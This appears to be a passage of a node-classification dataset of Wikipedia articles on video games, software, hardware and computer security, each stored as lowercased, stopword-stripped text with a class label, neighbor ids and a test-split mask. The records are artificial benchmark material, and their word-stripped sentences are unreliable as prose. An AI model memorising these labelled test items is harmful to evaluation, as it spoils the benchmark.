android mobile platforms japan release based 2004 mobile remake game united states europe mobile versions released september 11 2014 dragon warrior inspired related media form manga series adapted anime symphonic video game soundtrack manga series written chiaki kawamata junji koyanagi artwork kamui fujiwara published 1991 1997 monthly shōnen gangan enix compiled series 21 volumes later released compact disc 1994 released december 11 2009 playstation store part initial launch sony digital comic distribution 1996 anime movie based manga released videocassette square enix started publishing sequel series 2005. wrote first four volumes takashi umemura wrote last five yuji horii supervised manga kamui fujiwara contributed artwork dragon quest saga emblem roto takes place dragon warrior iii dragon warrior monsters possessed carmen king seven years kingdom fell hordes evil survivors prince arus army general daughter lunafrea meanwhile kingdom loran child born named jagan accordance demon lord imagine orders arus lunafrea set defeat monsters restore peace world sequel children inherit emblem takes place five years events dragon quest saga emblem roto world chaos young boy sets gather companions help save world evil koichi sugiyama composed directed music dragon warrior soundtrack included eight tracks rpgfan said foundation sugiyama career pieces arranged incorporated later dragon warrior games soundtracks music released variety formats first drama cd released enix july 19 1991 incorporated narrated story super famicom edition symphonic suite dragon quest published sony records january 12 1994 followed soundtrack featured orchestral versions tracks played london philharmonic orchestra original versions tunes game classical score considered revolutionary console game music soundtrack eight melodies approach set template rpg soundtracks released since hundreds organized similar manner orchestral albums dragon warrior ii combined symphonic suite dragon quest i•ii released sme visual works august 23 2000 king records reprinted october 7 2009 orchestral tracks released symphonic suite dragon quest album including orchestral versions game sound effects numerous live concerts featured performances game music many performances later released albums dragon quest concert suite dragon quest i•ii initial sales game low enix going lose money several shonen jump articles horii helped increase sales substantially people liked toriyama artwork sugiyama music book said richer exciting game music ever sounded game extremely popular japan became first series 2016 includes eleven games several spin-off series stand-alone titles 2 million copies sold japanese version dragon quest ii remake snes yielded 1.2 million copies sold japan 1989 soft catalog issue famicom tsūshin famitsu included dragon quest list best games time receiving best rpg best character design awards losing dragon quest iii overall grand prize best game time several years japanese release first english-language version dragon warrior garnered average reviews overall nintendo power ranked third five upon original release debuted 7 magazine bimonthly top 30 top nes games list november 1989 climbed 5 january 1990 remained 4 months dropped 11 may 14 july 16 september 1990 dropped list nintendo power awards 1989 game nominated best theme fun best overall failed win either category response japanese youths arrests waiting dragon quest iii release electronic gaming monthly quartermann said game special compared nes version recommended others play game instead english version seen commercial failure according chris kohler nintendo power subscription success allowed enix bring next three games said nintendo profited immensely dragon warrior subscription giveaway nintendo power essentially hundred-page monthly ad nintendo products thousands households game release regarded important history console rpg kohler noted toriyama sugiyama contributions game made dragon quest visually aurally exciting game play unique sophisticated gamespot named one fifteen influential titles video game history ign listed eighth best all-time nes game 2005 listed 92nd-best all-time video game 2007 listed game 29th best nintendo power rated dragon warrior 140th-best game made nintendo system top 200 games list 2006 ign reviewed game years later gave 7.8 10 rpgamer bill johnson gave 4 5 overall score nes localization received considerable praise adding extra characters depth story removal stylized dialogue gbc remake similarly lamented allgame declared despite enormous influence ... dragon warrior flawed game decent design ideas terribly enjoyable noting simplistic graphics slow pace poor sound seemingly primitive today standards dragon warrior features one-on-one combat limited item equipment array ten spells five towns five dungeons noting importance development rpg genre allgame reviewer kyle knight states taken merits enjoyable game play 1up.com explained series immensely popular first north america american console gamers used idea rpgs said would take decade genre flashy enough distract words made read gamecritics chi kong lui wrote game added realism video games added player perished dragon warrior suffer dire consequences losing progress precious gold element death evoked sense instinctive fear tension survival said allowed players identify main character much larger scale ign writer mark nix compared game seemingly archaic plot modern rpgs said noble blood means nothing society capitalist aristocratic militaristic damsels n't need rescuing – need battle axe magic tutoring field reviewing gamespy staff wrote many gamers dragon warrior first exposure console rpg recalling past staff member commented bill johnson compared dragon warrior modern rpgs noted game complete lack replay value due much requirement almost everything game must done beat difficulty johnson noted game historical importance said playing dragon warrior tough road walk reaching end instill new appreciation today rpg 2009 book vintage games contrasted dragon warrior 1986 nes title legend zelda said titles share common rpg elements zelda features fantasy setting magic level turn-based combat system dragon warrior features nintendo power said game historical significance greatest aspect noted playing dragon warrior days bit chore gamepro wrote favorite aspect game elizabethan-english dialogue disappointed removal gbc remake famitsu gave snes compilation remake dragon quest ii rating 35 40 satellaview remake given mixed overall positive review microgroup touches real-time event voicing appreciated implementation left much desired however medal collection nice way compete friends reviewer enjoyed game dragon warrior english remake part dual gbc cartridge dragon warrior ii received better reviews original garnering praise ign nintendo power gave 8 10 ign marc nix noted one interesting rpgs game boy color actually make american shores players feel frustrated played original lament changes new players feel game linear simple gamespot gave 9.6 10 citing great improvements sound quality appeal playing games succession gamerankings reports 82 overall score received rpgamer game boy color award year 2000 comparing nes counterpart rpgamer derek cavin awarded 3 5 wrote game average aspects particularly praised visual elements criticized game repetitiveness said short enough players finish game repetition becomes issue combined snes gbc remakes saw 1.94 million copies sold worldwide remakes good sales performances enix released dragon warrior iii gbc 2001 based previously unreleased snes update dragon quest iii english version square enix music online juan2darien reviewed game symphonic scores dragon quest suite dragon quest remix symphonic suite london philharmonic orchestra dragon quest ii symphonic suite london philharmonic orchestra remastered dragon quest symphonic suite tokyo metropolitan symphony orchestra comparing suites gave ratings ranging 7 9 10 found tokyo strings ensemble recording superior aforementioned symphonic suites music somewhat flat juan2darien acknowledged due source material praised koichi sugiyama orchestras efforts compose above-average piece despite limitation gamasutra kurt kalata also praised symphonies melody commenting overworld theme ... pretty simplistic grating actually sounds pretty beautiful played live orchestra dragon quest retsuden roto monshō – children inherit emblem sold well japan week august 26 september 1 2008 volume 7 ranked 9th japan selling 59,540 copies week february 24 march 2 2009 volume 8 ranked 19th japan selling 76,801 copies week october 26 november 1 2009 volume 9 ranked 16th japan selling 40,492 copies total 60,467 dragon warrior release noted notable turning point video game history game listed genre builder rpgs popularity japan synonymous rpgs game elements present previous rpg titles dragon warrior set template others almost elements became foundation nearly every later game genre gameplay narrative according shigeru miyamoto success dragon warrior changed nature video game development making scenario writers far important dragon warrior released many development techniques used intended compensate hardware limitations contemporary rpg developers continue use techniques despite technological advances made unnecessary dragon warrior introduced damsel-in-distress storyline many rpgs follow fresh plot twist saving princess formula game true objective revealed princess rescued game also introduced element romance player character given dialogue choice respond princess question whether loves romance since become commonplace feature genre game 2d graphic style used rpgs advent 3d graphics dragon warrior top-down perspective become dead giveaway rpg game featured elements still found rpgs ability obtain better equipment major quests intertwine minor subquests incremental spell system use hit points experience points medieval theme reviewers said final fantasy considered important due popularity attention north america dragon warrior laid fundamentals final fantasy based nintendo power november 2010 issue celebration nes 25th anniversary north america horii recalled making dragon warrior horiii fan basic rpg mechanics wanted simplify interfaces said many rpgs interfaces time complicated intimidated new users said dragon warrior simplified gameplay made game appealing people made franchise successful told nes lacked sufficient capacity rpgs motivated make one dragon quest became national phenomenon japan inspiring spinoff media figurines video game industry called japan national game horii linked shonen jump articles increased celebrity status become household name japan well known japan steven spielberg us contrast miyamoto creator super mario bros. legend zelda nearly well-known famitsu poll japanese public voted dragon quest seventh favorite game nes several clones glory heracles legend ghost lion mother inspired japanese version success mother shigesato itoi fan dragon warrior miyamoto detractor rpgs created rpg would subvert dragon warrior rpg template changing setting themes middle ages us dragon warrior along nes titles spawned many rom hacks recent years one notable hack includes super mario remix ii features new plot revised character sprites reflect mario series gameplay layout remain dragon warrior became popular japan asked draw 'slime japanese person likely draw shape similar game interpretation slime many aspects pop culture still reference dragon warrior video game music band descendants erdrick based austin texas named game main character april fools day 2012 google added dragon warrior -inspired 8-bit option google maps 2016 spin-off title dragon quest builders released alternate sequel first game story set 100 years consequences erdrick instead accepts dragonlord offer rule half world",
    "neighbors": [
      577,
      4932,
      2469,
      2633,
      1773,
      9006,
      2383,
      4527,
      6096,
      3346,
      5436
    ],
    "mask": "Test"
  },
  {
    "node_id": 7024,
    "label": 4,
    "text": "Security_switch:security switch security switch hardware device protect computers laptops smartphones similar devices unauthorized access operation distinct virtual security switch offers software protection security switches operated authorized user reason isolated devices order prevent unauthorized access possible bypass order prevent malicious manipulation primary purpose security switch provide protection cellphone surveillance eavesdropping malware spyware cyberwarfare laptop theft theft smartphones similar devices unlike protections techniques security switch provide protection even computer phone security already broken since access components accessible device software disconnect block peripheral device perform man middle operations like isolated encryption similar operations security switch s.s. used human presence detection since signals sent initiated human operator manipulated bypassed s.s. also used internet security hardware firewall concept security switch patented 2007 presented 35th ieee symposium security privacy",
    "neighbors": [
      5389,
      9688,
      7515,
      4348,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 7025,
    "label": 4,
    "text": "Martin_Roesch:martin roesch martin roesch founded sourcefire 2001 served chief technology officer company acquired cisco systems october 7 2013 roesch serves vice president chief architect cisco ’ security business group respected authority intrusion prevention detection technology forensics responsible technical direction product development efforts martin industry experience network security embedded systems engineering also author lead developer snort intrusion prevention detection system forms foundation sourcefire 3d system martin developed various network security tools technologies including intrusion prevention detection systems honeypots network scanners policy enforcement systems organizations gte internetworking stanford telecommunications inc. united states department defense martin interviewed industry expert multiple technology publications well print online news services msnbc wall street journal cnet zdnet scientific american also interviewed several books network intrusion detection analysts handbook intrusion signatures analysis maximum security hacking exposed others 2006 martin named one informationweek 18 innovators influencers one tech council maryland influential ctos maryland martin also recipient 2004 infoworld heroes innovator award well winning 2004 40 40 award baltimore business journal martin holds b.s electrical computer engineering clarkson university also author daemonlogger",
    "neighbors": [
      6834,
      3486
    ],
    "mask": "None"
  },
  {
    "node_id": 7026,
    "label": 9,
    "text": "Mirah_(programming_language):mirah programming language mirah formerly duby programming language based ruby language syntax local type inference hybrid static–dynamic type system pluggable compiler toolchain mirah created charles oliver nutter 'ruby-like language probably subset ruby syntax could compile solid fast idiomatic jvm bytecode word refers gemstone ruby javanese language play concept ruby java foster participation jruby project ruby community members nutter began explore possibility presenting ruby syntax static type model direct-to-native compiling context native meant mainly java virtual machine jvm mirah designed around possibility alternative backends object-oriented runtimes like common language runtime clr .net framework language needed look feel like ruby introduce new library dependencies jruby precludes jvm languages suffer performance penalty precludes writing ruby early versions mirah duby focused mostly mathematical performance dynamic programming languages often pay highest cost since evolved full jvm language several users real-world applications using core components mirah mostly pluggable compiler toolchain main elements chain phases last two need specific knowledge eventual target platform makes mirah suitable many backends also makes possible write language plug-ins mirah transformation phase apply supported backends equally simple pieces code jvm bytecode backend mirah compiler emits nearly instructions standard javac compilers mirah compiler ships standard library intent mirah users choose libraries want use perhaps write plugins mirah compiler support compiler rest explicit design goal avoid introducing requirement new external library standard library mirah whatever standard library current backend emphasis placed writing compiler plugins rather libraries extend enhance language mirah impose specific type system users instead relying whatever target backend provides jvm type system largely java type system type declarations refer jvm classes primitives interfaces mirah primarily statically-typed language support development allow dynamic typing also mechanism similar provided c 4 special dynamic type indicating dispatches variable value done dynamically dynamic type support currently planned java 7 higher using new codice_1 bytecode syntax mirah largely syntax ruby modifications support static typing outside differences mirah code generally looks like ruby code mirah development developers using mirah production applications limited scope dubious project running mirah google app engine provides way build apps mirah conventions familiar developers using ruby rails sinatra since everything compiled ahead-of-time mirah applications none initializing costs associated jruby dubious supports eruby erb simple datastore adapter uses syntax similar datamapper",
    "neighbors": [
      9345,
      1591,
      1343,
      8262,
      9482,
      5612,
      5677,
      7983,
      5872,
      3573,
      5399,
      5945,
      9245,
      5567
    ],
    "mask": "Test"
  },
  {
    "node_id": 7027,
    "label": 2,
    "text": "Debian_GNU/kFreeBSD:debian gnu/kfreebsd debian gnu/kfreebsd discontinued operating system released debian project used freebsd kernel gnu userland majority software debian gnu/kfreebsd built sources debian kernel packages freebsd k kfreebsd abbreviation kernel refers freebsd kernel discontinuing project debian maintained i386 amd64 ports last version debian kfreebsd debian 8 jessie rc3 debian gnu/kfreebsd created 2002 included debian 6.0 squeeze technology preview debian 7.0 wheezy official port debian gnu/kfreebsd discontinued officially supported platform debian 8.0 failed attract enough users justify burden rest project debian developers cited oss pf jails ndis zfs reasons interested freebsd kernel updated since debian 8 july 2019 however operating system continues maintained unofficially",
    "neighbors": [
      10761,
      10257,
      7187,
      8727,
      4123,
      4636,
      3618,
      1071,
      9784,
      5177,
      8262,
      8266,
      5710,
      593,
      7249,
      9306,
      607,
      3685,
      9324,
      8816,
      9844,
      9343,
      2180,
      11410,
      2212,
      684,
      3248,
      1718,
      5819,
      9407,
      11459,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      6371,
      5356,
      11506,
      5363,
      1273,
      7425,
      5380,
      1801,
      274,
      1813,
      5397,
      8476,
      10016,
      6438,
      10535,
      4908,
      7983,
      9009,
      11573,
      7483,
      5962,
      850,
      6491,
      10079,
      7521,
      1891,
      8554,
      9074,
      2421,
      2424,
      7552,
      8582,
      1927,
      9625,
      1946,
      11698,
      1465,
      3006,
      10687,
      5067,
      3551,
      998,
      4073,
      2545,
      3058,
      9201,
      3068,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7028,
    "label": 8,
    "text": "So-net:so-net",
    "neighbors": [
      10368,
      643,
      9091,
      3077,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      9137,
      306,
      1587,
      1091,
      9543,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      3824,
      5746,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 7029,
    "label": 2,
    "text": "N.O.V.A._Near_Orbit_Vanguard_Alliance:n.o.v.a near orbit vanguard alliance near orbit vanguard alliance better known n.o.v.a short action-adventure video game ipod apple products made apple gameloft released december 17 2009 ios webos one games containing gameloft live online gaming service later released playstation network playstation portable playstation 3 december 21 2010 five days release n.o.v.a 2 n.o.v.a legacy free download pay2progress game marketed remaster original n.o.v.a developed gameloft madrid actually locations original story completely removed released android google play store 2017 app store ios 2018 game hostiles known xenos similar metroid series well halo series n.o.v.a primarily first-person shooter one on-rails driving segment throughout game twelve levels players fight alien enemies known xenos game takes major cues sci-fi console shooters halo metroid series player use eight weapons resemble futuristic versions weapons found one gameloft previous works players use multiplayer n.o.v.a following ways indeterminate point future earth rendered uninhabitable humans animals unknown means therefore humans built satellites space order protect xenos created alliance called n.o.v.a near orbit vanguard alliance kal wardin n.o.v.a commander enjoying drink 2 soldiers come knock kal wakes training area tries head ship attacked xenos goes colonial frigate gone quiet time unknown reasons kal crashes ship inside air lock attacked raiders kal told self-destruct frigate explodes lands back earth meets later possible survivors frigate goes planet xenos yelena deleted pushes finds judger kal kills whole planet possibly explodes game well received critics metacritic score 94/100 based 9 reviews levi buchanan ign awarded game 9.0/10 calling best first-person shooter iphone right pocket gamer gave game 9/10 gold award slide play gave perfect 4/4 saying fans fpses n't let one slip halo ripoff packs lot great content tiny modestly-priced package high-definition version game released app store april 1 2010 however compatible apple ipad tablet pc july 21 2010 n.o.v.a along heavily updated iphone 4 includes gyroscope control hd 3d graphics compatible multitasking ios 4 august 31 2010 free version n.o.v.a hd released ipad remaster game called n.o.v.a legacy updated graphics weapon upgrade system power meter features released march 27 2017 sequel n.o.v.a developed published gameloft released itunes app store december 16 2010 titled game innovated many designs created first n.o.v.a added many new features 10-player online multiplayer matches retina display gyroscope support iphone 4 later may 10 2012 n.o.v.a 3 released app store also developed published gameloft added new features 2-man cars multiplayer updated graphics working in-house editor",
    "neighbors": [
      10080,
      6940,
      9063,
      8937,
      6539,
      3948,
      7029,
      11254,
      10330,
      2492,
      8413
    ],
    "mask": "Test"
  },
  {
    "node_id": 7030,
    "label": 4,
    "text": "Privilege_bracketing:privilege bracketing computer security privilege bracketing temporary increase software privilege within process perform specific function assuming necessary privileges last possible moment dismissing soon longer strictly necessary therefore ostensibly avoiding fallout erroneous code unintentionally exploits privilege merited example use principle least privilege defensive programming distinguished privilege separation much effective security measure separates privileged parts system unprivileged parts putting different processes opposed switching within single process",
    "neighbors": [
      174,
      10835,
      8344,
      7804,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7031,
    "label": 4,
    "text": "Port_scanner:port scanner port scanner application designed probe server host open ports application may used administrators verify security policies networks attackers identify network services running host exploit vulnerabilities port scan portscan process sends client requests range server port addresses host goal finding active port nefarious process majority uses port scan attacks rather simple probes determine services available remote machine portsweep scan multiple hosts specific listening port latter typically used search specific service example sql-based computer worm may portsweep looking hosts listening tcp port 1433 design operation internet based internet protocol suite commonly also called tcp/ip system network services referenced using two components host address port number 65536 distinct usable port numbers services use limited range port numbers port scanners scan common port numbers ports commonly associated vulnerable services given host result scan port usually generalized one three categories open ports present two vulnerabilities administrators must wary filtered ports tend present vulnerabilities forms port scanning rely assumption targeted host compliant rfc 793 transmission control protocol although case time still chance host might send back strange packets even generate false positives tcp/ip stack host non-rfc-compliant altered especially true less common scan techniques os-dependent fin scanning example tcp/ip stack fingerprinting method also relies types different network responses specific stimulus guess type operating system host running simplest port scanners use operating system network functions generally next option go syn feasible option described next nmap calls mode connect scan named unix connect system call port open operating system completes tcp three-way handshake port scanner immediately closes connection avoid performing denial-of-service attack otherwise error code returned scan mode advantage user require special privileges however using os network functions prevents low-level control scan type less common method noisy particularly portsweep services log sender ip address intrusion detection systems raise alarm syn scan another form tcp scanning rather using operating system network functions port scanner generates raw ip packets monitors responses scan type also known half-open scanning never actually opens full tcp connection port scanner generates syn packet target port open respond syn-ack packet scanner host responds rst packet closing connection handshake completed port closed unfiltered target instantly respond rst packet use raw networking several advantages giving scanner full control packets sent timeout responses allowing detailed reporting responses debate scan less intrusive target host syn scan advantage individual services never actually receive connection however rst handshake cause problems network stacks particular simple devices like printers conclusive arguments either way udp scanning also possible although technical challenges udp connectionless protocol equivalent tcp syn packet however udp packet sent port open system respond icmp port unreachable message udp port scanners use scanning method use absence response infer port open however port blocked firewall method falsely report port open port unreachable message blocked ports appear open method also affected icmp rate limiting alternative approach send application-specific udp packets hoping generate application layer response example sending dns query port 53 result response dns server present method much reliable identifying open ports however limited scanning ports application specific probe packet available tools e.g. nmap generally probes less 20 udp services commercial tools many 70 cases service may listening port configured respond particular probe packet ack scanning one unusual scan types exactly determine whether port open closed whether port filtered unfiltered especially good attempting probe existence firewall rulesets simple packet filtering allow established connections packets ack bit set whereas sophisticated stateful firewall might rarely used outdated nature window scanning fairly untrustworthy determining whether port opened closed generates packet ack scan checks whether window field packet modified packet reaches destination design flaw attempts create window size packet port open flagging window field packet 1 returns sender using scanning technique systems longer support implementation returns 0 window field labeling open ports closed since syn scans surreptitious enough firewalls general scanning blocking packets form syn packets fin packets bypass firewalls without modification closed ports reply fin packet appropriate rst packet whereas open ports ignore packet hand typical behavior due nature tcp ways inescapable downfall unusual scan types exist various limitations widely used nmap supports many internet service providers restrict customers ability perform port scans destinations outside home networks usually covered terms service acceptable use policy customer must agree isps implement packet filters transparent proxies prevent outgoing service requests certain ports example isp provides transparent http proxy port 80 port scans address appear port 80 open regardless target host actual configuration information gathered port scan many legitimate uses including network inventory verification security network port scanning however also used compromise security many exploits rely upon port scans find open ports send specific data patterns attempt trigger condition known buffer overflow behavior compromise security network computers therein resulting loss exposure sensitive information ability work threat level caused port scan vary greatly according method used scan kind port scanned number value targeted host administrator monitors host port scan often viewed first step attack therefore taken seriously disclose much sensitive information host despite probability port scan alone followed real attack small probability attack much higher port scan associated vulnerability scan inherently open decentralized architecture internet lawmakers struggled since creation define legal boundaries permit effective prosecution cybercriminals cases involving port scanning activities example difficulties encountered judging violations although cases rare time legal process involves proving intent commit break-in unauthorized access existed rather performance port scan 2006 uk parliament voted amendment computer misuse act 1990 person guilty offence makes adapts supplies offers supply article knowing designed adapted use course connection offence section 1 3 cma nevertheless area effect amendment blurred widely criticized security experts germany strafgesetzbuch § 202a b c also similar law council european union issued press release stating plan pass similar one albeit precise",
    "neighbors": [
      774,
      6548,
      11413,
      5402,
      5405,
      3486,
      2084,
      3750,
      8998,
      939,
      10924,
      10413,
      7983,
      1200,
      2739,
      9146,
      1474,
      7364,
      10437,
      11464,
      6993,
      979,
      4956,
      10332,
      11486,
      2409,
      8692,
      4725,
      5113,
      2041,
      5245,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 7032,
    "label": 2,
    "text": "Overlay_(programming):overlay programming general computing sense overlaying means process transferring block program code data main memory replacing already stored overlaying programming method allows programs larger computer main memory embedded system would normally use overlays limitation physical memory internal memory system-on-chip lack virtual memory facilities constructing overlay program involves manually dividing program self-contained object code blocks called overlays laid tree structure sibling segments depth level share memory called overlay region destination region overlay manager either part operating system part overlay program loads required overlay external memory destination region needed often linkers provide support overlays following example shows control statements instruct os/360 linkage editor link overlay program indented show structure segment names arbitrary statements define tree consisting permanently resident segment called root two overlays b loaded following end mod2 overlay consists two overlay segments aa ab execution time overlays b utilize memory locations aa ab utilize locations following end mod3 segments root given overlay segment called path business applications intended run platforms virtual memory developer platform design program memory constraint exist unless program working set exceeds available physical memory importantly architect focus problem solved without added design difficulty forcing processing steps constrained overlay size thus designer use higher-level programming languages allow programmer much control size e.g java c++ smalltalk still overlays remain useful embedded systems low-cost processors used embedded systems provide memory management unit mmu addition many embedded systems real-time systems overlays provide determinate response-time paging example space shuttle primary avionics system software pass uses programmed overlays even platforms virtual memory software components codecs may decoupled point loaded needed home computer era overlays popular operating system many computer systems ran lacked virtual memory little ram current standards — original ibm pc 16k 64k depending configuration overlays popular technique commodore basic load graphics screens order detect overlay already loaded flag variable could used several dos linkers 1980s supported overlays form nearly identical used 25 years earlier mainframe computers binary files containing memory overlays de facto standard extension .ovl file type used among others wordstar dbase enable dos office automation software package enable software inc.. gfa basic compiler able produce .ovl files",
    "neighbors": [
      4614,
      6664,
      11539,
      9881,
      5677,
      8494,
      7983,
      11059,
      4151,
      10040,
      1864,
      4553,
      5840,
      9300,
      10590,
      7776,
      8037,
      8301,
      2804,
      3062,
      3960
    ],
    "mask": "Test"
  },
  {
    "node_id": 7033,
    "label": 3,
    "text": "TRIPS_architecture:trips architecture trips microprocessor architecture designed team university texas austin conjunction ibm intel sun microsystems trips uses instruction set architecture designed easily broken large groups instructions graphs run independent processing elements design collects related data graphs attempting avoid expensive data reads writes keeping data high speed memory close processing elements prototype trips processor contains 16 elements trips hoped reach 1 tflop single processor papers published 2003 2006 computer programs consist series instructions stored memory processor runs program fetching instructions memory examining performing actions instruction calls early machines speed main memory generally order time basic operation within processor instance instruction adds two numbers might take three four instruction cycles fetching numbers memory might take one two cycles machines penalty data main memory instruction set architectures generally designed allow direct access instance add instruction might take value one location memory add value another store result third location introduction increasingly fast microprocessors cheap-but-slower dynamic ram changed equation dramatically modern machines fetching value main memory might take equivalent thousands cycles one key advances risc concept include processor registers earlier designs typically several dozen rather two three instructions formerly provided memory locations eliminated replaced ones worked registers loading data register explicit separate load action performed results explicitly saved back one could improve performance eliminating many memory instructions possible technique quickly reached limits since 1990s modern cpus added increasing amounts cpu cache increase local storage although cache slower registers since late 1990s performance gains mostly made use additional functional units allow instructions run parallel instance two addition instructions working different data run time effectively doubling speed program modern cpus generally dozens units integer math boolean logic floating point math long-data words others dealing memory housekeeping chores however programs work independent data instead use outputs one calculation input another limits set instructions run parallel factor based many instructions processor able examine on-the-fly level instruction parallelism quickly plateaued mid-2000s one attempt break limit long instruction word vliw concept vliw hands task looking instruction parallelism compiler removing processor theory allows entire program examined independent instructions sent processor order make maximal use functional units however proven difficult practice vliw processors become widely popular even case vliw another problem grown become issue traditional designs data instructions handled different parts cpu processing speeds low cause problems performance increased communication times one side chip registers functional units grows become significant fraction overall processing time gains performance registers distributed closer functional units trips processor based explicit data graph execution edge concept edge attempts bypass certain performance bottlenecks come dominate modern systems edge based processor able better understand instruction stream sent seeing linear stream individual instructions rather blocks instructions related single task using isolated data edge attempts run instructions block distributing internally along data need process compilers examine code find blocks code share information specific way assembled compiled hyperblocks fed cpu since compiler guaranteeing blocks specific interdependencies processor isolate code single functional unit local memory consider simple example adds two numbers memory adds result another value memory case traditional processor would notice dependency schedule instructions run one storing intermediate results registers edge processor interdependencies data code would noticed compiler would compile instructions single block block would fed along data needed complete single functional unit private set registers ensures additional memory fetching required well keeping registers physically close functional unit needs values code rely intermediate data would compiled separate hyperblocks course possible entire program would use data compilers also look instances data handed code effectively abandoned original block common access pattern case compiler still produce two separate hyperblocks explicitly encode handoff data rather simply leaving stored shared memory location processor see communications events schedule run proper order blocks considerable interdependencies re-arranged compiler spread communications order avoid bottlenecking transport effect change greatly increase isolation individual functional units edge processors limited parallelism capabilities compiler on-chip systems whereas modern processors reaching plateau four-wide parallelism edge designs scale much wider also scale deeper well handing blocks one unit another chain scheduled reduce contention due shared values university texas austin implementation edge concept trips processor tera-op reliable intelligently adaptive processing system trips cpu built repeating single basic functional unit many times needed trips design use hyperblocks loaded en-masse allows dramatic gains speculative execution whereas traditional design might hundred instructions examine possible scheduling functional units trips design thousands hundreds instructions per hyperblock hundreds hyperblocks examined leads greatly improved functional unit utilization scaling performance typical 4-issue superscalar design trips process three times many instructions per cycle traditional designs variety different types units integer floating point etc. allowing parallelism four-wide schedulers would otherwise allow however order keep units active instruction stream include different types instruction often case practice traditional cpus often lots idle functional units trips individual units general purpose allowing instruction run core avoid need carefully balance number different kinds cores also means trips design built number cores needed reach particular performance requirement single-core trips cpu simplified eliminated scheduler run set hyperblocks exactly like one hundreds cores slower better yet performance dependent types data fed meaning trips cpu run much wider variety tasks level performance instance traditional cpu fed math-heavy workload bog soon floating point units busy integer units lying idle fed data intensive program like database job floating point units lie idle integer units bog trips cpu every functional unit add performance every task every task run every unit designers refer polymorphic processor trips flexible regard developers suggested would even replace custom high-speed designs like dsps like trips dsps gain additional performance limiting data inter-dependencies unlike trips allowing limited workflow run trips would fast custom dsp workloads equally able run workloads time designers noted unlikely trips processor could used replace highly customized designs like gpus modern graphics cards may able replace outperform many lower-performance chips like used media processing reduction global register file also results non-obvious gains addition new circuitry modern processors meant overall size remained even move smaller process sizes result relative distance register file grown limits possible cycle speed due communications delays edge data generally local isolated well defined inter-core links eliminating large cross-chip delays means individual cores run higher speeds limited signaling time much shorter data paths combination two design changes effects greatly improves system performance goal produce single-processor system 1 tflops performance 2012 however 2008 gpus ati nvidia already exceeded 1 teraflop barrier albeit specialized applications traditional cpus contemporary 2007 mac pro using 2-core intel xeon perform 5 gflops single applications 2003 trips team started implementing prototype chip chip two complete cores one 16 functional units 4-wide 4-deep arrangement current implementation compiler constructs hyperblocks 128 instructions allows system keep 8 blocks flight time total 1,024 instructions per core basic design include 32 chips interconnected approaching 500 gflops",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      9665,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7034,
    "label": 4,
    "text": "Higher-order_differential_cryptanalysis:higher-order differential cryptanalysis cryptography higher-order differential cryptanalysis generalization differential cryptanalysis attack used block ciphers standard differential cryptanalysis difference two texts used higher-order differential cryptanalysis studies propagation set differences larger set texts xuejia lai 1994 laid groundwork showing differentials special case general case higher order derivates lars knudsen year able show concept higher order derivatives used mount attacks block ciphers attacks superior standard differential cryptanalysis higher-order differential cryptanalysis notably used break kn-cipher cipher previously proved immune standard differential cryptanalysis block cipher maps formula_1-bit strings formula_1-bit strings fixed key thought function formula_3 standard differential cryptanalysis one interested finding pair input difference formula_4 output difference formula_5 two input texts difference formula_4 likely result output texts difference formula_5 i.e. formula_8 true many formula_9 note difference used xor usual case though definitions difference possible motivates defining derivative function formula_3 point formula_4 formula_12 using definition formula_13-th derivative formula_14 recursively defined formula_15 thus example formula_16 higher order derivatives defined many properties common ordinary derivative sum rule product rule importantly also taking derivative reduces algebraic degree function implement attack using higher order derivatives knowledge probability distribution derivative cipher needed calculating estimating distribution generally hard problem cipher question known low algebraic degree fact derivatives reduce degree used example cipher s-box function analysis known algebraic degree 8 9th order derivative must 0 therefore important cipher s-box function specific maximal close maximal degree defy attack cube attacks considered variant higher-order differential attacks works small low algebraic degree s-boxes small s-boxes addition xor operations",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      3345,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 7035,
    "label": 4,
    "text": "Sucuri:sucuri sucuri company started daniel cid 2010 founder ossec project early premise sucuri provide webmasters tool provides visibility state security websites 2010 sucuri became private llc delaware dre armeda invited co-founder 2011 tony perez joined team third co-founder sucuri acquired godaddy march 2017 sucuri globally distributed company 100 employees across 27 different countries",
    "neighbors": [
      64,
      899,
      1994,
      331,
      11407,
      186,
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 7036,
    "label": 5,
